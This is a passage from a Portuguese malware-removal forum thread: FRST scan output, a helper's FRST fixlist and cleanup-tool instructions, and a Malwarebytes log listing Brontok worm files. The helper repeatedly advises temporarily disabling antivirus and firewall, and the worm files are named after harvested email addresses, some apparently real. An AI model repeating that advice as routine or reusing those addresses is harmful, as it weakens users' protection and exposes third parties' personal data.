    R3 ScpVBus; C:\Windows\System32\DRIVERS\ScpVBus.sys [39168 2013-05-19] (Scarlet.Crush Productions)
    R3 xb1usb; C:\Windows\System32\DRIVERS\xb1usb.sys [42760 2016-02-21] (Microsoft Corporation)
    R2 {B154377D-700F-42cc-9474-23858FBDF4BD}; C:\Program Files (x86)\CyberLink\PowerDVD9\000.fcl [146928 2009-02-28] (CyberLink Corp.)
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S3 X6va017; \??\C:\Windows\SysWOW64\Drivers\X6va017 [X]
    S3 X6va022; \??\C:\Windows\SysWOW64\Drivers\X6va022 [X]

    ==================== NetSvcs (Whitelisted) ===================

    (Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)


    ==================== Um Mês Criados arquivos e pastas ========

    (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

    2017-09-14 21:27 - 2017-09-14 21:27 - 000022657 _____ C:\Users\A\Desktop\FRST.txt
    2017-09-14 21:26 - 2017-09-14 21:27 - 000000000 ____D C:\FRST
    2017-09-14 21:26 - 2017-09-14 21:26 - 002398208 _____ (Farbar) C:\Users\A\Desktop\FRST64.exe
    2017-09-13 21:48 - 2017-09-13 21:48 - 000028272 _____ C:\Windows\system32\Drivers\TrueSight.sys
    2017-09-13 21:46 - 2017-09-13 22:02 - 000000000 ____D C:\Users\Todos os Usuários\RogueKiller
    2017-09-13 21:46 - 2017-09-13 22:02 - 000000000 ____D C:\ProgramData\RogueKiller
    2017-09-13 21:36 - 2017-09-13 21:38 - 000000000 ____D C:\AdwCleaner
    2017-09-13 20:09 - 2017-09-13 20:09 - 000136984 _____ C:\Users\A\AppData\Local\GDIPFONTCACHEV1.DAT
    2017-09-13 19:52 - 2017-09-13 19:52 - 005174872 _____ C:\Windows\system32\FNTCACHE.DAT
    2017-09-12 21:31 - 2017-09-12 21:31 - 000020249 _____ C:\Users\A\Desktop\mbam.txt
    2017-09-12 21:30 - 2017-09-14 20:39 - 000000000 ___HD C:\Users\Public\Documents\AdobeGC
    2017-09-12 21:01 - 2017-09-12 21:01 - 000192960 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
    2017-09-12 21:00 - 2017-09-14 20:31 - 000084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
    2017-09-12 21:00 - 2017-09-14 20:22 - 000253888 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
    2017-09-12 21:00 - 2017-09-14 20:22 - 000101824 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
    2017-09-12 21:00 - 2017-09-14 20:22 - 000045472 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
    2017-09-12 21:00 - 2017-09-12 21:00 - 000001830 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Users\Todos os Usuários\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\ProgramData\Malwarebytes
    2017-09-12 21:00 - 2017-09-12 21:00 - 000000000 ____D C:\Program Files\Malwarebytes
    2017-09-12 21:00 - 2017-08-24 11:27 - 000077440 _____ C:\Windows\system32\Drivers\mbae64.sys
    2017-09-11 22:04 - 2017-09-11 22:04 - 000000397 _____ C:\Users\A\Desktop\Cmd abrindo sozinho.txt
    2017-09-09 15:56 - 2017-09-09 15:56 - 000000000 ____D C:\Users\A\AppData\Local\MahoganyGame
    2017-09-09 15:34 - 2017-09-09 15:34 - 000000202 _____ C:\Users\A\Desktop\Project 1v1 Closed Technical Test.url
    2017-09-09 15:30 - 2017-09-09 16:59 - 000000000 ____D C:\Users\A\AppData\Local\UnrealEngine
    2017-08-31 01:46 - 2017-08-31 01:46 - 000000000 ____D C:\Users\A\AppData\Roaming\Bungie
    2017-08-31 01:16 - 2017-08-31 01:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Destiny 2
    2017-08-29 00:06 - 2017-08-29 00:06 - 000000000 ____D C:\Users\A\AppData\Local\id Software
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000336 _____ C:\Users\A\advanced_ip_scanner_MAC.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Comments.bin
    2017-08-24 01:24 - 2017-08-24 01:24 - 000000015 _____ C:\Users\A\advanced_ip_scanner_Aliases.bin
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced IP Scanner v2
    2017-08-24 00:06 - 2017-08-24 00:06 - 000000000 ____D C:\Program Files (x86)\Advanced IP Scanner
    2017-08-24 00:03 - 2017-08-24 00:03 - 000000000 ____D C:\Users\A\Documents\Network Monitor 3

    ==================== Um Mês Modificados arquivos e pastas ========

    (Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)

    2017-09-14 20:33 - 2017-04-27 20:23 - 000000000 ____D C:\Users\A\AppData\Local\Adobe
    2017-09-14 20:33 - 2014-07-04 07:43 - 000000000 ____D C:\Users\Todos os Usuários\NVIDIA
    2017-09-14 20:33 - 2014-07-04 07:43 - 000000000 ____D C:\ProgramData\NVIDIA
    2017-09-14 20:29 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2017-09-14 20:29 - 2009-07-14 01:45 - 000066112 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2017-09-14 20:27 - 2011-04-12 10:40 - 000709454 _____ C:\Windows\system32\prfh0416.dat
    2017-09-14 20:27 - 2011-04-12 10:40 - 000148732 _____ C:\Windows\system32\prfc0416.dat
    2017-09-14 20:27 - 2009-07-14 02:13 - 001645972 _____ C:\Windows\system32\PerfStringBackup.INI
    2017-09-14 20:27 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\inf
    2017-09-14 20:23 - 2014-07-17 17:59 - 000000000 ____D C:\Users\A\AppData\Local\Akamai
    2017-09-14 20:22 - 2009-07-14 02:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
    2017-09-13 22:02 - 2015-11-05 23:43 - 000000000 ____D C:\Program Files (x86)\Popcorn Time
    2017-09-12 21:45 - 2017-05-07 21:23 - 000000000 ____D C:\Users\A\AppData\Local\CrashDumps
    2017-09-11 21:39 - 2014-07-02 02:40 - 000000000 ____D C:\Users\A\AppData\Local\NVIDIA Corporation
    2017-09-03 21:57 - 2009-07-14 00:20 - 000000000 ____D C:\Windows\system32\NDF
    2017-08-31 22:54 - 2016-12-20 10:47 - 000000000 ____D C:\Users\A\AppData\Local\Battle.net
    2017-08-31 22:53 - 2016-12-20 10:42 - 000000000 ____D C:\Program Files (x86)\Battle.net
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002453 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat DC.lnk
    2017-08-31 20:32 - 2017-04-27 21:02 - 000002040 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Acrobat Distiller DC.lnk
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files\Rockstar Games
    2017-08-30 20:58 - 2017-07-01 02:35 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
    2017-08-28 20:57 - 2017-07-26 20:37 - 000000000 ____D C:\Users\A\Downloads\PopcornTime
    2017-08-28 20:03 - 2014-12-20 01:55 - 000002402 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2017-08-24 01:24 - 2014-07-04 07:44 - 000000000 ____D C:\Users\A

    ==================== Arquivos na raiz de alguns diretórios =======

    2015-03-19 19:43 - 2015-03-19 19:43 - 000000092 _____ () C:\Users\A\AppData\Roaming\settings.xml
    2014-12-02 21:13 - 2014-12-02 21:13 - 000017804 _____ () C:\Users\A\AppData\Roaming\unins001.dat
    2017-09-09 18:08 - 2017-09-09 18:08 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT56C.tmp
    2017-09-13 21:59 - 2017-09-13 21:59 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BIT8E5.tmp
    2017-08-03 22:48 - 2017-08-03 22:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC58F.tmp
    2017-09-10 12:41 - 2017-09-10 12:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC88E.tmp
    2017-07-24 21:20 - 2017-07-24 21:20 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITC960.tmp
    2017-08-27 10:05 - 2017-08-27 10:05 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITCCB9.tmp
    2017-08-13 21:54 - 2017-08-13 21:54 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITD286.tmp
    2017-06-11 22:17 - 2017-06-11 22:17 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITD2D8.tmp
    2017-08-20 10:14 - 2017-08-20 10:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDCA8.tmp
    2017-07-16 09:18 - 2017-07-16 09:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDD7A.tmp
    2017-08-06 11:46 - 2017-08-06 11:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITDF6D.tmp
    2017-09-08 23:52 - 2017-09-08 23:52 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE319.tmp
    2017-08-16 20:14 - 2017-08-16 20:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE73A.tmp
    2017-08-31 20:33 - 2017-08-31 20:33 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7AD.tmp
    2017-08-04 20:39 - 2017-08-04 20:39 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7E5.tmp
    2017-07-28 19:25 - 2017-07-28 19:25 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE7F8.tmp
    2017-08-06 19:46 - 2017-08-06 19:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE86B.tmp
    2017-08-19 09:16 - 2017-08-19 09:16 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE8C9.tmp
    2017-09-12 21:48 - 2017-09-12 21:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE926.tmp
    2017-09-09 12:42 - 2017-09-09 12:42 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE936.tmp
    2017-08-29 22:06 - 2017-08-29 22:06 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE94D.tmp
    2017-08-24 21:28 - 2017-08-24 21:28 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE95F.tmp
    2017-08-06 16:59 - 2017-08-06 16:59 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE964.tmp
    2017-08-17 20:38 - 2017-08-17 20:38 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE967.tmp
    2017-08-23 20:07 - 2017-08-23 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE98A.tmp
    2017-07-29 08:11 - 2017-07-29 08:11 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9C2.tmp
    2017-09-03 18:14 - 2017-09-03 18:14 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITE9D1.tmp
    2017-08-12 00:31 - 2017-08-12 00:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA0E.tmp
    2017-08-21 19:34 - 2017-08-21 19:34 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA49.tmp
    2017-09-02 22:26 - 2017-09-02 22:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA4F.tmp
    2017-08-25 19:29 - 2017-08-25 19:29 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA57.tmp
    2017-09-04 20:26 - 2017-09-04 20:26 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA69.tmp
    2017-07-27 19:41 - 2017-07-27 19:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEA87.tmp
    2017-07-25 20:45 - 2017-07-25 20:45 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEAA3.tmp
    2017-07-16 15:10 - 2017-07-16 15:10 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEABE.tmp
    2017-08-23 23:12 - 2017-08-23 23:12 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB49.tmp
    2017-07-16 20:04 - 2017-07-16 20:04 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB59.tmp
    2017-09-01 19:55 - 2017-09-01 19:55 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB5E.tmp
    2017-08-28 20:07 - 2017-08-28 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB64.tmp
    2017-07-20 20:13 - 2017-07-20 20:13 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB73.tmp
    2017-08-15 16:31 - 2017-08-15 16:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB84.tmp
    2017-07-21 20:08 - 2017-07-21 20:08 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB8D.tmp
    2017-07-18 22:00 - 2017-07-18 22:00 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEB91.tmp
    2017-07-16 19:28 - 2017-07-16 19:28 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC5.tmp
    2017-08-19 10:22 - 2017-08-19 10:22 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC6.tmp
    2017-08-26 08:40 - 2017-08-26 08:40 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEBC7.tmp
    2017-09-13 22:18 - 2017-09-13 22:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC03.tmp
    2017-09-03 10:55 - 2017-09-03 10:55 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC59.tmp
    2017-09-09 20:31 - 2017-09-09 20:31 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC61.tmp
    2017-09-14 20:37 - 2017-09-14 20:37 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEC8B.tmp
    2017-09-12 20:35 - 2017-09-12 20:35 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED28.tmp
    2017-09-07 13:27 - 2017-09-07 13:27 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED5A.tmp
    2017-07-15 17:18 - 2017-07-15 17:18 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED6A.tmp
    2017-08-18 23:37 - 2017-08-18 23:37 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITED82.tmp
    2017-09-06 21:50 - 2017-09-06 21:50 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE1C.tmp
    2017-06-12 19:48 - 2017-06-12 19:48 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE1F.tmp
    2017-07-26 20:20 - 2017-07-26 20:20 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEE6A.tmp
    2017-08-22 19:51 - 2017-08-22 19:51 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEEBC.tmp
    2017-09-05 20:33 - 2017-09-05 20:33 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEF36.tmp
    2017-09-11 21:43 - 2017-09-11 21:43 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEF68.tmp
    2017-08-30 20:56 - 2017-08-30 20:56 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITEFA6.tmp
    2017-06-21 19:46 - 2017-06-21 19:46 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF109.tmp
    2017-09-02 13:00 - 2017-09-02 13:00 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF161.tmp
    2017-09-13 20:07 - 2017-09-13 20:07 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF482.tmp
    2017-07-15 14:41 - 2017-07-15 14:41 - 000000000 ____H () C:\Users\A\AppData\Roaming\Microsoft\BITF510.tmp
    2014-12-10 19:31 - 2014-12-10 19:31 - 000000017 _____ () C:\Users\A\AppData\Local\resmon.resmoncfg
    2016-06-02 06:54 - 2016-06-02 06:54 - 000000057 _____ () C:\ProgramData\Ament.ini

    Alguns arquivos em TEMP:
    ====================
    2017-09-13 21:46 - 2013-08-28 23:16 - 001732032 _____ (Microsoft Corporation) C:\Users\A\AppData\Local\Temp\dllnt_dump.dll

    ==================== Bamital & volsnap ======================

    (Não há correção automática para arquivos que não passaram na verificação.)

    C:\Windows\system32\winlogon.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\wininit.exe => O arquivo é assinado digitalmente
    C:\Windows\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\explorer.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\svchost.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\services.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\User32.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\userinit.exe => O arquivo é assinado digitalmente
    C:\Windows\system32\rpcss.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\SysWOW64\dnsapi.dll => O arquivo é assinado digitalmente
    C:\Windows\system32\Drivers\volsnap.sys => O arquivo é assinado digitalmente

    LastRegBack: 2017-09-10 16:09

    ==================== Fim de FRST.txt ============================

    Addition.txt

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Desative temporariamente seu antivírus, antispywares e firewall, para não causar conflitos.

    Abra o seu Bloco de Notas, copie (control + c) e cole (control + v) todo o texto que está no CODE abaixo:

    CreateRestorePoint:
    CloseProcesses:
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-1444981709-1690395092-1683229413-1000\...\Run: [AdobeBridge] => [X]
    S2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [X]
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ShellIconOverlayIdentifiers-x32: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  -> Nenhum Arquivo
    ContextMenuHandlers3: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> Nenhum Arquivo
    AlternateDataStreams: C:\Windows\zoek-delete.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\MijFrc.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nlasvc.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\ntoskrnl.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nvdispco6434709.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nvdispgenco6434709.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\nvhdagenco64.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\profsvc.dll:$CmdTcID [130]
    AlternateDataStreams: C:\Windows\system32\rstrui.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\srclient.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\srcore.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\TSWbPrxy.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\ncsi.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\nlaapi.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\ntkrnlpa.exe:$CmdTcID [130]
    AlternateDataStreams: C:\Windows\SysWOW64\ntoskrnl.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\SysWOW64\srclient.dll:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\Drivers\MijXfilt.sys:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\Drivers\mrxdav.sys:$CmdTcID [64]
    AlternateDataStreams: C:\Windows\system32\Drivers\xusb21.sys:$CmdTcID [64]
    AlternateDataStreams: C:\Program Files\Common Files\Microsoft Shared:UPcfOAsE1KunjptYH0m02qzp [1740]
    AlternateDataStreams: C:\Users\A\Cookies:pWHKllbk8iXaipFAB5TDsQ [1962]
    AlternateDataStreams: C:\Users\A\AppData\Local\377wbLvawwhm:fJxd617Wb8DI0RTPPTB43qFAk7fQV [2124]
    AlternateDataStreams: C:\Users\A\AppData\Local\Temp:$DATA [16]
    AlternateDataStreams: C:\Users\A\AppData\Local\Temp:ssFkwJuAbIKTYKDrHimGW2j [1828]
    AlternateDataStreams: C:\Users\A\Documents\Produção 1.dmsm:Roxio EMC Stream [38]
    AlternateDataStreams: C:\ProgramData\Microsoft:LNDHNwLQFpmHyXMHzErh2FQP [1934]
    AlternateDataStreams: C:\ProgramData\Microsoft:rG8Gh5XOmwb4Mi5XrZ [1998]
    AlternateDataStreams: C:\Users\Todos os Usuários\Microsoft:LNDHNwLQFpmHyXMHzErh2FQP [1934]
    AlternateDataStreams: C:\Users\Todos os Usuários\Microsoft:rG8Gh5XOmwb4Mi5XrZ [1998]
    VirusTotal: C:\ComboFix\catchme.sys
    VirusTotal: C:\Windows\SysWOW64\Drivers\X6va017
    VirusTotal: C:\Windows\SysWOW64\Drivers\X6va022
    CMD: ipconfig /flushdns
    RemoveProxy:
    EmptyTemp:
    CreateRestorePoint:

    Salve este arquivo na na sua área de trabalho com o nome fixlist

    OBS: É de extrema importância que o arquivo "fixlist" seja salvo na sua Área de Trabalho/Desktop. Verifique também se o FRST.exe encontra-se na Área de Trabalho/Desktop.

    Clique no botão Fix.

    Aguarde e ao final, o log Fixlog.txt será salvo no seu desktop.

    Anexe o log na sua próxima resposta

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites

    @Murilo Beraldo

     

    Siga os passos abaixo:

    ETAPA 1

    Baixe o Malwarebytes Anti-Malware (MBAM) do link abaixo e salve no seu desktop.
    https://downloads.malwarebytes.org/file/mbam_current/
     
    Clique duas vezes no mbam-setup.exe e siga o solicitado para instalar o programa.

    • Na aba Análise > Analise Personalizada marque a opção Procurar rootkits e as entradas referente a instalação do sistema operacional. Normalmente é o drive C:;
    • Clique em Analisar Agora. Aguarde, pois o scan pode demorar;
    • Ao acabar o scan, se houver itens encontrados, certifique-se que estejam todas marcados e clique no botão Remover Selecionadas ou Colocar em Quarentena;
    • Ao final da desinfecção, poderá aparecer um aviso se quer reiniciar o PC. (Ver Nota abaixo);
    • Caso o mbam não seja executado automaticamente após a reinicialização, execute manualmente;
    • O log é automaticamente salvo pelo MBAM e para vê-lo, clique na aba Relatórios na janela principal do programa;
    • Clique duas vezes no log (Registro de verificação). Clique no botão Exportar e utilize o formato .txt para exportar o log. Salve na Área de Trabalho;
    • Abra o arquivo, selecione tudo, copie e cole o conteúdo deste log em sua próxima resposta.



    NOTA: Se o MBAM encontrar arquivos que não consiga remover, poderá ter de reiniciar o PC (talvez mais de uma vez). Faça isso imediatamente, ao ser perguntado se quer reiniciar o PC.

    ETAPA 2

    Faça o download do AdwCleaner de um dos links abaixo e salve no desktop.
    https://toolslib.net/downloads/viewdownload/1-adwcleaner/
    http://www.bleepingcomputer.com/download/adwcleaner/

    Clique em DOWNLOAD NOW para baixar o arquivo.

    Execute o adwcleaner.exe

    OBS: Usuários do Windows Vista, 7, 8/8.1 e windows 10 clique com o direito sobre o arquivo AdwCleaner.exe, depois clique em VRIfczU.png

    Clique em EXAMINAR. Após o termino clique em LIMPAR e aguarde.

    Será aberto o bloco de notas com o resultado.

    Selecione, copie e cole o seu conteúdo na próxima resposta.

    ETAPA 3

    Desative temporariamente seu antivirus, antispywares e firewall, para não causar conflitos.

    Baixe jrt.exe do link abaixo e salve no desktop.
    http://www.bleepingcomputer.com/download/junkware-removal-tool/

    Dê um duplo-clique para executar o Junkware Removal Tool (JRT).

    OBS: Usuários do Windows Vista, 7, 8/8.1 e windows 10 clique com o direito sobre o arquivo jrt.exe, depois clique em VRIfczU.png

    A ferramenta comecará o exame do seu sistema. Tenha paciência pois pode demorar um pouco dependendo da quantidades de ítens a examinar.

    Ao final, um log se abrirá. É salvo no desktop com o nome de JRT.txt.

    Selecione, copie e cole o conteúdo deste log na sua próxima resposta.

    Compartilhar este post


    Link para o post
    Compartilhar em outros sites
  • Autor do tópico
  • Ola! Seguem abaixo os logs

     

    Só para constar...essas detecções que o mbam fez ja apareceram mais de uma vez (na mesma quantidade tb).

    Obrigado!

     

    Mbam Log

     

    Malwarebytes
    www.malwarebytes.com

    -Detalhes de registro-
    Data da análise: 17/09/17
    Hora da análise: 22:35
    Arquivo de registro: b31d2dac-9c11-11e7-aec0-40167eab023a.json
    Administrador: Sim

    -Informação do software-
    Versão: 3.2.2.2029
    Versão de componentes: 1.0.188
    Versão do pacote de definições: 1.0.2826
    Licença: Versão de Avaliação

    -Informação do sistema-
    Sistema operacional: Windows 7 Service Pack 1
    CPU: x64
    Sistema de arquivos: NTFS
    Usuário: LUCAS-PC\A

    -Resumo da análise-
    Tipo de análise: Análise Customizada
    Resultado: Concluído
    Objetos verificados: 463194
    Ameaças detectadas: 147
    Ameaças em quarentena: 147
    Tempo decorrido: 24 min, 28 seg

    -Opções da análise-
    Memória: Habilitado
    Inicialização: Habilitado
    Sistema de arquivos: Habilitado
    Arquivos compactados: Habilitado
    Rootkits: Habilitado
    Heurística: Habilitado
    PUP: Detectar
    PUM: Detectar

    -Detalhes da análise-
    Processo: 0
    (Nenhum item malicioso detectado)

    Módulo: 0
    (Nenhum item malicioso detectado)

    Chave de registro: 1
    PUP.Optional.PopDeals, HKLM\SOFTWARE\PopDeals, Quarentena, [2622], [241849],1.0.2826

    Valor de registro: 0
    (Nenhum item malicioso detectado)

    Dados de registro: 0
    (Nenhum item malicioso detectado)

    Fluxo de dados: 0
    (Nenhum item malicioso detectado)

    Pasta: 1
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok, Quarentena, [2750], [370221],1.0.2826

    Arquivo: 145
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@a.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@a.com.au.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@a.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@b.c.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\a@b.cc.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\aa@bb.org.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\aaronchi@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ab@1.1.1.111.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\ab@cd.ef.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\alysson87@gmail.com.ini, Quarentena, [2750], [370221],1.0.2826
    Worm.Brontok.Generic, C:\Users\A\AppData\Local\Loc.Mail.Bron.Tok\aperson@dom.ain.ini, Quarentena, [2750], [370221],1.0.2826
